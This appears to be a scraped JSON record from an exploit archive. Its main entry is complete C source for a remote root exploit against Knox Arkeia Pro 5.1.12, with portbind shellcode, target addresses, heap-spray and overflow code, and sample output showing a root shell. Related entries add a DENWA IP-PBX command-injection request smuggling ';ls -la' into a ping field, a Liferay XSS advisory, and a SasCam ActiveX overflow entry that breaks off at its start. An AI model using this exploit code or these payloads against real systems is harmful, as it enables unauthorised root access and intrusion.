{"type": "zdt", "lastseen": "2016-04-20T01:50:08", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Knox Arkeia Pro 5.1.12 Backup Remote Root Exploit", "published": "2003-09-20T00:00:00", "href": "http://0day.today/exploit/description/8349", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for linux platform in category remote exploits", "hash": "2c82bd363972e64250ab51ce5b925694f905699e5f2247184afd10d2207929e3", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "=================================================\r\nKnox Arkeia Pro 5.1.12 Backup Remote Root Exploit\r\n=================================================\r\n\r\n/*\r\n * Knox Arkiea arkiead local/remote root exploit.\r\n *\r\n * Portbind 5074 shellcode\r\n *\r\n * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.\r\n * \r\n * NULLs out least significant byte of EBP to pull EIP out of overflow buffer.\r\n * A previous request forces a large allocation of NOP's + shellcode in heap\r\n * memory. Find additional targets by searching the heap for NOP's after a \r\n * crash. safeaddr must point to any area of memory that is read/writable\r\n * and won't mess with program/shellcode flow. \r\n *\r\n * ./ark_sink host targetnum \r\n * [user@host dir]$ ./ark_sink 192.168.1.2 1\r\n * [*] Connected to 192.168.1.2:617\r\n * [*] Connected to 192.168.1.2:617\r\n * [*] Sending nops+shellcode\r\n * [*] Done, sleeping\r\n * [*] Sending overflow\r\n * [*] Done\r\n * [*] Sleeping and connecting remote shell\r\n * [*] Connected to 192.168.1.2:5074\r\n * [*] Success, enjoy\r\n * id\r\n * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\r\n *\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <sys/errno.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <arpa/nameser.h>\r\n\r\n\r\n#define BUFLEN\t\t10000\t\t/* for getshell() \t\t*/\r\n#define LEN \t\t280\t\t/* overflow packet data section */\r\n#define HEAD_LEN \t8\t\t /* overflow packet header\t*/\r\n#define NOP_LEN\t\t10000\t\t/* nop+shellcode packet \t*/\r\n#define ARK_PORT\t617\r\n#define SHELL_PORT\t5074\r\n#define NOP \t\t0x90\r\n#define NUMTARGS\t2\r\n\r\nstruct {\r\n\tchar \t\t*os;\r\n\tunsigned int\ttargret;\r\n\tunsigned int\ttargsafe;\r\n} targets[] = {\r\n\t{ \"Redhat 8.0\", 0x80ecf90, 0x080eb940 },\r\n\t{ \"Redhat 7.2\", 0x80eddc0, 0x080eb940 },\r\n\tNULL\r\n};\r\n\r\n\r\n/* portbind 5074 */\r\nconst char shellcode[] = \r\n\"\\x89\\xc3\\xb0\\x02\\xcd\\x80\\x38\\xc3\\x74\\x05\\x8d\\x43\\x01\\xcd\\x80\"\r\n\"\\x31\\xc0\\x89\\x45\\x10\\x40\\x89\\xc3\\x89\\x45\\x0c\\x40\\x89\\x45\\x08\"\r\n\"\\x8d\\x4d\\x08\\xb0\\x66\\xcd\\x80\\x89\\x45\\x08\\x43\\x66\\x89\\x5d\\x14\"\r\n\"\\x66\\xc7\\x45\\x16\\x13\\xd2\\x31\\xd2\\x89\\x55\\x18\\x8d\\x55\\x14\"\r\n\"\\x89\\x55\\x0c\\xc6\\x45\\x10\\x10\\xb0\\x66\\xcd\\x80\\x40\\x89\\x45\\x0c\"\r\n\"\\x43\\x43\\xb0\\x66\\xcd\\x80\\x43\\x89\\x45\\x0c\\x89\\x45\\x10\\xb0\\x66\"\r\n\"\\xcd\\x80\\x89\\xc3\\x31\\xc9\\xb0\\x3f\\xcd\\x80\\x41\\x80\\xf9\\x03\"\r\n\"\\x75\\xf6\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\"\r\n\"\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";\r\n\r\nunsigned int resolve(char *hostname)\r\n{\r\n\tu_long \tip = 0;\r\n\tstruct hostent\t*hoste;\r\n\r\n\tif ((int)(ip = inet_addr(hostname)) == -1)\r\n\t{\r\n\t\tif ((hoste = gethostbyname(hostname)) == NULL)\r\n\t\t{\r\n\t\t\therror(\"[!] gethostbyname\");\r\n\t\t\texit(-1);\r\n\t\t}\r\n\t\tmemcpy(&ip, hoste->h_addr, hoste->h_length);\r\n\t}\r\n\treturn(ip);\r\n}\r\n\r\n\r\nint isock(char *hostname, int portnum)\r\n{\r\n\tstruct sockaddr_in\tsock_a;\r\n\tint\t\t\tnum, sock;\r\n\tunsigned int\t\tip;\r\n\tfd_set\t\t\tinput;\r\n\r\n\tsock_a.sin_family = AF_INET;\r\n\tsock_a.sin_port = htons(portnum);\r\n\tsock_a.sin_addr.s_addr = resolve(hostname);\r\n\r\n\tif ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)\r\n\t{\r\n\t\therror(\"[!] accept\");\r\n\t\texit(-1);\r\n\t}\r\n\t\r\n\tif (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)))\r\n\t{\r\n\t\therror(\"[!] connect\");\r\n\t\texit(-1);\r\n\t}\r\n\t\r\n\tfprintf(stderr, \"[*] Connected to %s:%d\\n\", hostname, portnum);\r\n\treturn(sock);\r\n\t\r\n}\r\n\r\nint getshell(int sock)\r\n{\r\n\r\n\tchar\tbuf[BUFLEN];\r\n\tint\tnread=0;\r\n\r\n \twhile(1) \r\n\t{ \r\n \t\tfd_set input; \r\n \t\tFD_SET(0,&input); \r\n \t\tFD_SET(sock,&input); \r\n \t\tselect(sock+1,&input,NULL,NULL,NULL); \r\n \t\r\n\t\tif(FD_ISSET(sock,&input)) \r\n\t\t{ \r\n \t\t\tnread=read(sock,buf,BUFLEN); \r\n \t\t\twrite(1,buf,nread); \r\n \t\t} \r\n \t\tif(FD_ISSET(0,&input)) \r\n \t\t\twrite(sock,buf,read(0,buf,BUFLEN)); \r\n \t} \r\n}\r\n\r\nint usage(char *progname)\r\n{\r\n\tint \ti;\r\n\r\n\tfprintf(stderr, \"Usage:\\n./%s hostname target_num\\n\");\r\n\tfor (i = 0; targets[i].os; i++)\r\n\t\tfprintf(stderr, \"Target %d: %s\\n\", i+1, targets[i].os);\r\n\texit(-1);\r\n}\r\n\r\nint main( int argc, char **argv)\r\n{\r\n\r\n\t/* first 2 bytes are a type 74 request */\r\n\t/* last two bytes length */\r\n\tchar \t\thead[] = \"\\x00\\x4a\\x00\\x03\\x00\\x01\\xff\\xff\";\r\n\tchar \t\tdata[512];\r\n\tchar\t\tsc_req[20000];\r\n\tchar\t\t*host;\r\n\tunsigned int\t\ttnum;\r\n\tunsigned int \tsafeaddr;\r\n\tunsigned int \tret;\r\n\tint\t\tdatalen\t\t= LEN;\r\n\tint\t\tport\t\t= ARK_PORT;\r\n\tunsigned int\taddr\t\t= 0;\r\n\tint\t\tsock_overflow, sock_nops, sock_shell;\r\n\tint \t\ti;\r\n\r\n\tif (argc == 3)\r\n\t{\r\n\t\thost = argv[1];\r\n\t\ttnum = atoi(argv[2]);\r\n\t\tif (tnum > NUMTARGS || tnum == 0)\r\n\t\t{\r\n\t\t\tfprintf(stderr, \"[!] Invalid target\\n\");\r\n\t\t\tusage(argv[0]);\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n\t\tusage(argv[0]);\r\n\t}\r\n\t\r\n\ttnum--;\r\n\tret = targets[tnum].targret;\r\n\tsafeaddr = targets[tnum].targsafe;\r\n\r\n\tsock_overflow = sock_nops = sock_shell = 0;\r\n\tsock_nops = isock(host, port);\r\n\tsock_overflow = isock(host, port);\r\n\r\n\t// build data section of overflow packet\r\n\tmemset(data, 0x90, datalen);\r\n\tfor (i = 0; i < datalen; i += 4)\r\n\t\tmemcpy(data+i, (char *)&ret, 4);\r\n\t// we overwrite a pointer that must be a valid address\r\n\tmemcpy(data+datalen-12, (char *)&safeaddr, 4); \r\n\r\n\t// build header of overflow packet\r\n\tdatalen = ntohs(datalen);\r\n\tmemcpy(head+6, (char *)&datalen, 2);\r\n\r\n\t// build invalid packet with nops+shellcode\r\n\tmemset(sc_req, 0x90, NOP_LEN+1);\r\n\tmemcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode));\r\n\r\n\t// send invalid nop+shellcode packet\r\n\tfprintf(stderr, \"[*] Sending nops+shellcode\\n\");\r\n\twrite(sock_nops, sc_req, NOP_LEN+sizeof(shellcode)); \r\n\tfprintf(stderr, \"[*] Done, sleeping\\n\");\r\n\tsleep(1);\r\n\tclose(sock_nops);\r\n\r\n\t// send overflow\r\n\tfprintf(stderr, \"[*] Sending overflow\\n\");\r\n\twrite(sock_overflow, head, HEAD_LEN);\r\n\twrite(sock_overflow, data, LEN);\r\n\tfprintf(stderr, \"[*] Done\\n\");\r\n\tfprintf(stderr, \"[*] Sleeping and connecting remote shell\\n\");\r\n\tsleep (1);\r\n\tclose(sock_overflow);\r\n\r\n\t// connect to shell\r\n\tsock_shell = isock(host, SHELL_PORT);\r\n\tfprintf(stderr, \"[*] Success, enjoy\\n\");\r\n\tgetshell(sock_shell);\r\n\r\n}\r\n\r\n\r \n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-8349", "sourceHref": "http://0day.today/exploit/8349", "modified": "2003-09-20T00:00:00", "reporter": "n/a", "enchantments": {"vulnersScore": 3.6}}

{"result": {"zdt": [{"lastseen": "2016-04-20T00:06:17", "references": [], "description": "DENWA IP-PBX suffers from Command Execution Vulnerability on admin panel \rso, you should login first and then exploit the vulnerability,", "edition": 1, "reporter": "BaD-HaCKeR-MaN", "published": "2016-04-03T00:00:00", "title": "DENWA IP-PBX - Admin Panel Command Execution Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-04-03T00:00:00", "id": "1337DAY-ID-25155", "href": "http://0day.today/exploit/description/25155", "sourceData": "==============================================================================\r\n# Vulnerability : DENWA IP-PBX - Admin Panel Command Execution Vulnerability\r\n# Vendor : www.denwaip.com \r\n# Version : All Versions\r\n# Author : BaD-HaCKeR-MaN from Delta Cyber Security \r\n# Author Site : Delta Cyber Security [ www.d4audit.com ]\r\n==============================================================================\r\n\r\nDENWA IP-PBX is Voice Over IP Communication device,\r\nDENWA IP-PBX suffers from Command Execution Vulnerability on admin panel \r\nso, you should login first and then exploit the vulnerability,\r\nOnce you logged in, go to DEBUG -> Network Tools -> PING\r\n\r\n'Destination' Box is vulnerable ... \r\n\r\nSo by reviewing GET Request ... this run through '/process/pingTest.php' file\r\nAnd GET 'host' is vulnerable bcs no filtering of user input .. \r\n\r\nPOC: \r\n\r\nTarget : https://192.168.1.52/\r\n\r\nGET /process/pingTest.php?host=127.0.0.1;ls%20-la&count=4&_=1459683255311\r\nHost: 192.168.1.52\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html, */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nX-Requested-With: XMLHttpRequest\r\nReferer: https://192.168.1.52/toolNet.php\r\nCookie: PHPSESSID=imhj3jo8oq7ejkjlftjm25v2d4\r\nConnection: keep-alive\r\n\r\nRes:\r\n\r\nPING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.\r\n64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.027 ms\r\n64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.034 ms\r\n64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.034 ms\r\n64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.035 ms\r\n\r\n--- 127.0.0.1 ping statistics ---\r\n4 packets transmitted, 4 received, 0% packet loss, time 2997ms\r\nrtt min/avg/max/mdev = 0.027/0.032/0.035/0.006 ms\r\ntotal 6760\r\ndrwxrwxr-x 2 www-data root 12288 Apr 2 15:39 .\r\ndrwxrwxr-x 24 www-data root 4096 Apr 2 18:13 ..\r\n-rw-rw-r-- 1 www-data root 535 Mar 17 2015 .htaccess\r\n-rw-r--r-- 1 www-data www-data 2 Apr 2 15:39 1.txt\r\n-rw-rw-r-- 1 www-data root 156201 Mar 17 2015 activateProc.php\r\n-rw-rw-r-- 1 www-data root 12457 Mar 17 2015 addons.load.php\r\n-rw-rw-r-- 1 www-data root 10417 Mar 17 2015 addons.proc.php\r\n-rw-rw-r-- 1 www-data root 34449 Mar 17 2015 announcementProc.php\r\n-rw-rw-r-- 1 www-data root 49065 Mar 17 2015 applicationProc.php\r\n-rw-rw-r-- 1 www-data root 24273 Nov 27 2012 backupProc.php\r\n-rw-rw-r-- 1 www-data root 2 Nov 27 2012 backupStatus.txt\r\n-rw-rw-r-- 1 www-data root 10417 Mar 17 2015 blockedDestinationsProc.php\r\n-rw-rw-r-- 1 www-data root 10385 Mar 17 2015 blockedIncomingPrefixesProc.php\r\n-rw-rw-r-- 1 www-data root 20617 Nov 27 2012 callServiceProc.php\r\n-rw-rw-r-- 1 www-data root 44445 Jan 8 02:46 callwaitingProc.php\r\n-rw-rw-r-- 1 www-data root 115025 Mar 17 2015 cardFileProc.php\r\n-rw-rw-r-- 1 www-data root 64637 Nov 27 2012 card_related_functions.inc.php\r\n-rw-rw-r-- 1 www-data root 11985 Nov 27 2012 checkExtension.php\r\n-rw-rw-r-- 1 www-data root 26153 Mar 17 2015 compare.php\r\n-rw-rw-r-- 1 www-data root 423 Nov 27 2012 compare_orig.html\r\n-rw-rw-r-- 1 www-data root 10065 Nov 27 2012 conferenceProc.php\r\n-rw-rw-r-- 1 www-data root 14493 Nov 27 2012 contactImportProc.php\r\n-rw-rw-r-- 1 www-data root 38921 Nov 27 2012 costCenterProc.php\r\n-rw-rw-r-- 1 www-data root 41745 Jan 8 02:46 deviceDiscovery.inc.php\r\n-rw-rw-r-- 1 www-data root 47037 Nov 27 2012 deviceProc.php\r\n-rw-rw-r-- 1 www-data root 19753 Nov 27 2012 deviceTemplatesProc.php\r\n-rw-rw-r-- 1 www-data root 79537 Mar 17 2015 dhcpServerProc.php\r\n-rw-rw-r-- 1 www-data root 20637 Nov 27 2012 didsProc.php\r\n-rw-rw-r-- 1 www-data root 3689 Nov 27 2012 dolog.php\r\n-rw-rw-r-- 1 www-data root 10929 Mar 20 2015 downFilesProc.php\r\n-rw-rw-r-- 1 www-data root 22953 Nov 27 2012 emailTest.php\r\n-rw-rw-r-- 1 www-data root 14461 Nov 27 2012 externalDirProc.php\r\n-rw-rw-r-- 1 www-data root 38225 Jan 8 02:46 firewallProc.php\r\n-rw-rw-r-- 1 www-data root 17981 Jan 8 02:46 firewall_import.php\r\n-rw-rw-r-- 1 www-data root 50737 Mar 17 2015 followmeProc.php\r\n-rw-rw-r-- 1 www-data root 27645 Mar 17 2015 fraudRuleProc.php\r\n-rw-rw-r-- 1 www-data root 8585 May 15 2015 generalSetup.proc.php\r\n-rw-rw-r-- 1 www-data root 6141 Nov 27 2012 generateProvFile.php\r\n-rw-rw-r-- 1 www-data root 15241 Nov 27 2012 groupExtensionProc.php\r\n-rw-rw-r-- 1 www-data root 31729 Mar 17 2015 groupProc.php\r\n-rw-rw-r-- 1 www-data root 6897 Nov 27 2012 homeTextProc.php\r\n-rw-rw-r-- 1 www-data root 7761 Nov 27 2012 imServerProc.php\r\n-rw-rw-r-- 1 www-data root 33961 Mar 17 2015 ivr.holiday.proc.php\r\n-rw-rw-r-- 1 www-data root 8457 Nov 27 2012 ivrAdvancedProc.php\r\n-rw-rw-r-- 1 www-data root 74141 Mar 17 2015 ivrAudioProc.php\r\n-rw-rw-r-- 1 www-data root 14353 Nov 27 2012 ivrExtensionProc.php\r\n-rw-rw-r-- 1 www-data root 38065 Jul 27 2015 ivrModesProc.php\r\n-rw-rw-r-- 1 www-data root 38033 Nov 27 2012 ivrNumberProc.php\r\n-rw-rw-r-- 1 www-data root 33565 Mar 20 2015 ivrOptionProc.php\r\n-rw-rw-r-- 1 www-data root 59345 Jul 27 2015 ivrProc.php\r\n-rw-rw-r-- 1 www-data root 26769 Mar 17 2015 licensesProc.php\r\n-rw-rw-r-- 1 www-data root 59049 Mar 17 2015 loadApplicationInfo.php\r\n-rw-rw-r-- 1 www-data root 20625 Nov 27 2012 loadApplications.php\r\n-rw-rw-r-- 1 www-data root 10313 Nov 27 2012 loadBackup.php\r\n-rw-rw-r-- 1 www-data root 22161 Nov 27 2012 loadBlackList.php\r\n-rw-rw-r-- 1 www-data root 5841 Mar 17 2015 loadBlockedDestinations.php\r\n-rw-rw-r-- 1 www-data root 5865 Mar 17 2015 loadBlockedIncomingPrefixes.php\r\n-rw-rw-r-- 1 www-data root 114429 Jun 15 2015 loadCDRs.php\r\n-rw-rw-r-- 1 www-data root 92785 Mar 20 2015 loadCDRs_ext.php\r\n-rw-rw-r-- 1 www-data root 5693 Nov 27 2012 loadCardFile.php\r\n-rw-rw-r-- 1 www-data root 20137 Nov 27 2012 loadCostCenterInfo.php\r\n-rw-rw-r-- 1 www-data root 14397 Jun 15 2015 loadCostCenters.php\r\n-rw-rw-r-- 1 www-data root 61905 Jan 8 02:46 loadDeviceInfo.php\r\n-rw-rw-r-- 1 www-data root 59561 Jan 8 02:46 loadDeviceModels.php\r\n-rw-rw-r-- 1 www-data root 47145 Nov 27 2012 loadDeviceToAdd.php\r\n-rw-rw-r-- 1 www-data root 34897 Jan 8 02:46 loadDevices.php\r\n-rw-rw-r-- 1 www-data root 49137 Nov 27 2012 loadDirectory.php\r\n-rw-rw-r-- 1 www-data root 19377 Mar 17 2015 loadExistingAudios.php\r\n-rw-rw-r-- 1 www-data root 32733 Mar 20 2015 loadFirewallInfo.php\r\n-rw-rw-r-- 1 www-data root 5949 Mar 17 2015 loadFraudRulePrefixes.php\r\n-rw-rw-r-- 1 www-data root 11633 Mar 17 2015 loadFraudRules.php\r\n-rw-rw-r-- 1 www-data root 26761 Mar 17 2015 loadGroups.php\r\n-rw-rw-r-- 1 www-data root 15965 Jan 8 02:46 loadHomeInfo.php\r\n-rw-rw-r-- 1 www-data root 38065 Nov 27 2012 loadInServerCards.php\r\n-rw-rw-r-- 1 www-data root 23069 Mar 17 2015 loadIvrOptions.php\r\n-rw-rw-r-- 1 www-data root 105777 Mar 17 2015 loadMonitorDigitalInfo.php\r\n-rw-rw-r-- 1 www-data root 19889 Mar 17 2015 loadNetworkConn.php\r\n-rw-rw-r-- 1 www-data root 41373 Jan 8 02:46 loadNetworkInterfaces.php\r\n-rw-rw-r-- 1 www-data root 23313 Nov 27 2012 loadPBXEntity.php\r\n-rw-rw-r-- 1 www-data root 14173 Nov 27 2012 loadPBXs.php\r\n-rw-rw-r-- 1 www-data root 23793 Mar 20 2015 loadRecordings.php\r\n-rw-rw-r-- 1 www-data root 32081 Jun 15 2015 loadReportsIvrs.php\r\n-rw-rw-r-- 1 www-data root 6705 Nov 27 2012 loadReportsSystem.php\r\n-rw-rw-r-- 1 www-data root 35869 Nov 27 2012 loadSelectIADPort.php\r\n-rw-rw-r-- 1 www-data root 29545 Mar 17 2015 loadTelephonyDevices.php\r\n-rw-rw-r-- 1 www-data root 55389 Jan 8 02:46 loadTrunkChannels.php\r\n-rw-rw-r-- 1 www-data root 17661 Jun 15 2015 loadTrunkInfo.php\r\n-rw-rw-r-- 1 www-data root 12401 Mar 17 2015 loadTrunkNumbers.php\r\n-rw-rw-r-- 1 www-data root 21629 Nov 27 2012 loadTrunkPrefixes.php\r\n-rw-rw-r-- 1 www-data root 11337 Nov 27 2012 loadTrunkRules.php\r\n-rw-rw-r-- 1 www-data root 78505 Mar 17 2015 loadTrunkSMSChannels.php\r\n-rw-rw-r-- 1 www-data root 38033 Jan 8 02:46 loadTrunks.php\r\n-rw-rw-r-- 1 www-data root 31785 Mar 17 2015 loadUserChannels.php\r\n-rw-rw-r-- 1 www-data root 14685 Mar 17 2015 loadUserConfig.php\r\n-rw-rw-r-- 1 www-data root 23997 Nov 27 2012 loadUserDeviceInfo.php\r\n-rw-rw-r-- 1 www-data root 165705 Mar 17 2015 loadUsers.php\r\n-rw-rw-r-- 1 www-data root 8017 Nov 27 2012 loadWebServer.php\r\n-rw-rw-r-- 1 www-data root 21457 Nov 27 2012 loadWhiteList.php\r\n-rw-r--r-- 1 www-data www-data 76380 Mar 2 05:23 mmmshellll.txt\r\n-rw-rw-r-- 1 www-data root 6929 Nov 27 2012 mohProc.php\r\n-rw-rw-r-- 1 www-data root 100305 Mar 17 2015 ne.confProc.php\r\n-rw-rw-r-- 1 www-data root 27197 Nov 27 2012 ne.confProc_test.php\r\n-rw-rw-r-- 1 www-data root 65577 Mar 17 2015 ne.datarouting.proc.php\r\n-rw-rw-r-- 1 www-data root 84189 May 15 2015 ne.dataservices.proc.php\r\n-rw-rw-r-- 1 www-data root 16157 Mar 17 2015 ne.dwmix.load.php\r\n-rw-rw-r-- 1 www-data root 45897 Mar 17 2015 ne.dwmix.proc.php\r\n-rw-rw-r-- 1 www-data root 47389 Mar 17 2015 ne.dwmix.telports.proc.php\r\n-rw-rw-r-- 1 www-data root 56061 Nov 27 2012 ne.dwp801d.monitor.load.php\r\n-rw-rw-r-- 1 www-data root 21981 Mar 17 2015 ne.dwp801d.telports.load.php\r\n-rw-rw-r-- 1 www-data root 19921 Mar 17 2015 ne.dwp801d.telports.proc.php\r\n-rw-rw-r-- 1 www-data root 48061 Mar 17 2015 ne.dwp808a.telports.proc.php\r\n-rw-rw-r-- 1 www-data root 53489 Mar 20 2015 ne.dwp80x.conf.load.php\r\n-rw-rw-r-- 1 www-data root 18333 Mar 20 2015 ne.dwp80x.conf.proc.php\r\n-rw-rw-r-- 1 www-data root 17705 Mar 17 2015 ne.dwp80x.events.load.php\r\n-rw-rw-r-- 1 www-data root 9361 Nov 27 2012 ne.dwp80x.events.proc.php\r\n-rw-rw-r-- 1 www-data root 41033 Mar 17 2015 ne.dwp80x.monitor.sbc.proc.php\r\n-rw-rw-r-- 1 www-data root 65297 Mar 17 2015 ne.loadInfo.php\r\n-rw-rw-r-- 1 www-data root 10321 Nov 27 2012 ne.loadInfo_test.php\r\n-rw-rw-r-- 1 www-data root 49213 Nov 27 2012 ne.security.proc.php\r\n-rw-rw-r-- 1 www-data root 44113 Mar 17 2015 networkConnProc.php\r\n-rw-rw-r-- 1 www-data root 76209 Jan 8 02:46 networkingProc.php\r\n-rw-rw-r-- 1 www-data root 27389 Nov 27 2012 ntpServerProc.php\r\n-rw-rw-r-- 1 www-data root 22769 Mar 17 2015 operatorProc.php\r\n-rw-rw-r-- 1 www-data root 45233 Nov 27 2012 pbxProc.php\r\n-rw-rw-r-- 1 www-data root 12413 Nov 27 2012 pbxProfileProc.php\r\n-rw-rw-r-- 1 www-data root 12881 Nov 27 2012 pbxTrunkNumberProc.php\r\n-rw-rw-r-- 1 www-data root 19697 Jul 27 2015 pickupCallProc.php\r\n-rw-rw-r-- 1 www-data root 8349 Nov 27 2012 pingLoadBoxy.php\r\n-rw-rw-r-- 1 www-data root 11849 Nov 27 2012 pingTest.php\r\n-rw-rw-r-- 1 www-data root 24765 Nov 27 2012 pppoeProc.php\r\n-rw-rw-r-- 1 www-data root 17865 May 15 2015 pptpServerProc.php\r\n-rw-rw-r-- 1 www-data root 20349 Jan 8 02:46 prefixImportProc.php\r\n-rw-rw-r-- 1 www-data root 371177 Jan 8 02:46 provisioning.php\r\n-rw-rw-r-- 1 www-data root 63421 Jul 27 2015 queueProc.php\r\n-rw-rw-r-- 1 www-data root 41309 May 15 2015 recordingProc.php\r\n-rw-rw-r-- 1 www-data root 24425 Jul 27 2015 restoreProc.php\r\n-rw-rw-r-- 1 www-data root 20265 Nov 27 2012 routeGroupsBlockedRoutesProc.php\r\n-rw-rw-r-- 1 www-data root 23997 Nov 27 2012 routeGroupsProc.php\r\n-rw-rw-r-- 1 www-data root 73705 Nov 27 2012 routeGroupsRoutesProc.php\r\n-rw-rw-r-- 1 www-data root 52017 Mar 17 2015 searchDevices.php\r\n-rw-rw-r-- 1 www-data root 78621 Jun 15 2015 setupProc.php\r\n-rw-rw-r-- 1 www-data root 4337 Mar 17 2015 signalingMonitorProcess.php\r\n-rw-rw-r-- 1 www-data root 52541 Nov 27 2012 snifferProc.php\r\n-rw-rw-r-- 1 www-data root 22473 Mar 20 2015 snmpServerProc.php\r\n-rw-rw-r-- 1 www-data root 13577 Nov 27 2012 storeProc.php\r\n-rw-rw-r-- 1 www-data root 40713 Mar 17 2015 supportProc.php\r\n-rw-rw-r-- 1 www-data root 9801 Mar 17 2015 systemProc.php\r\n-rw-rw-r-- 1 www-data root 7581 Mar 17 2015 task.load.php\r\n-rw-rw-r-- 1 www-data root 139249 Mar 20 2015 tdmCardProc.php\r\n-rw-rw-r-- 1 www-data root 60497 Mar 17 2015 telephonyDevicesProc.php\r\n-rw-rw-r-- 1 www-data root 13993 Jan 8 02:46 toolsTest.php\r\n-rw-rw-r-- 1 www-data root 65225 Mar 17 2015 trunkChannelProc.php\r\n-rw-rw-r-- 1 www-data root 49073 Nov 27 2012 trunkCodecsProc.php\r\n-rw-rw-r-- 1 www-data root 34289 Mar 17 2015 trunkNumberProc.php\r\n-rw-rw-r-- 1 www-data root 34057 Nov 27 2012 trunkPrefixProc.php\r\n-rw-rw-r-- 1 www-data root 103901 Jul 27 2015 trunkProc.php\r\n-rw-rw-r-- 1 www-data root 13777 Nov 27 2012 trunkRuleProc.php\r\n-rw-rw-r-- 1 www-data root 23997 Mar 17 2015 trunkSBCProc.php\r\n-rw-rw-r-- 1 www-data root 9617 Nov 27 2012 updateSystem.php\r\n-rw-rw-r-- 1 www-data root 9949 Nov 27 2012 upgradeSystem.php\r\n-rw-rw-r-- 1 www-data root 6729 Nov 27 2012 uploadAudio.php\r\n-rw-rw-r-- 1 www-data root 14897 Nov 27 2012 userApplicationProc.php\r\n-rw-rw-r-- 1 www-data root 32401 Jan 8 02:46 userBatchCreationProc.php\r\n-rw-rw-r-- 1 www-data root 14333 Mar 17 2015 userChannelProc.php\r\n-rw-rw-r-- 1 www-data root 50589 Mar 17 2015 userCodecsProc.php\r\n-rw-rw-r-- 1 www-data root 19017 Mar 17 2015 userConfigProc.php\r\n-rw-rw-r-- 1 www-data root 15625 Nov 27 2012 userImportProc.php\r\n-rw-rw-r-- 1 www-data root 105417 Jan 8 02:46 userMassiveProc.php\r\n-rw-rw-r-- 1 www-data root 27805 Nov 27 2012 userMonUsersProc.php\r\n-rw-rw-r-- 1 www-data root 220561 Jan 8 02:46 userProc.php\r\n-rw-rw-r-- 1 www-data root 36329 Nov 27 2012 userProfilesCallServicesProc.php\r\n-rw-rw-r-- 1 www-data root 55069 Nov 27 2012 userProfilesProc.php\r\n-rw-rw-r-- 1 www-data root 33713 Nov 27 2012 vpnProc.php\r\n-rw-rw-r-- 1 www-data root 8797 Nov 27 2012 webServerProc.php\r\n\r\n\r\nThanks ... \r\nwww.d4audit.com || Delta Security Solutions \r\n\r\n\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/25155"}, {"lastseen": "2016-04-19T04:28:58", "references": [], "edition": 1, "description": "Liferay Portal versions 6.2 EE SP8 and below suffer from a cross site scripting vulnerability.", "reporter": "Ariel Walter Garcia", "published": "2014-11-21T00:00:00", "title": "Liferay Portal 6.2 EE SP8 Cross Site Scripting Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8349"], "modified": "2014-11-21T00:00:00", "href": "http://0day.today/exploit/description/22910", "id": "1337DAY-ID-22910", "sourceData": "- Vendor Status: CONFIRMED\r\n\r\n- Vendor Disclosure Date: October 17th 2014\r\n\r\n- Public Disclosure Date: November 14th 2014\r\n\r\n- Affected Vendor: LIFERAY - http://www.liferay.com/\r\n\r\n- Affected System: Liferay Portal 6.2 EE SP8 and older versions\r\n\r\n- Vulnerability Status: Fixed\r\n\r\n\r\nAssociated CWE:\r\n\r\nCWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - http://cwe.mitre.org/data/definitions/79.html\r\n\r\n******************************************************************************\r\n\r\nCVE-2014-8349:\r\n\r\nCross-site scripting (XSS) vulnerability in Liferay Portal Enterprise Edition (EE) allows remote authenticated users to inject arbitrary web script or HTML via the \"_20_body\" parameter in the comment field of an uploaded file.\r\n\r\nThe Javascript injection will later exploit when clicking on \"View\" from under the \"My Workflow Tasks\" option within the \"My Account\" menu, when logged in with an administrator account, and looking for the approval of comments.\r\n\r\n\r\n- Available fix:\r\n\r\n Patch: LPE-12961\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "http://0day.today/exploit/22910"}, {"lastseen": "2016-04-20T00:29:22", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 1, "reporter": "Blake", "published": "2010-07-05T00:00:00", "type": "zdt", "title": "SasCam 2.7 ActiveX Head Buffer Overflow", "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-07-05T00:00:00", "href": "http://0day.today/exploit/description/13127", "id": "1337DAY-ID-13127", "sourceData": "=======================================\r\nSasCam 2.7 ActiveX Head Buffer Overflow\r\n=======================================\r\n\r\n\r\n# Exploit Title: SasCam 2.7 ActiveX Head Buffer Overflow\r\n# Author: Blake\r\n# Software Link:\r\nhttp://download.cnet.com/SasCam-Webcam-Server/3000-2348_4-10491197.html\r\n# Version: 2.7\r\n# Tested on: Windows XP SP3 / IE6 and 7\r\n \r\n<html>\r\n<object 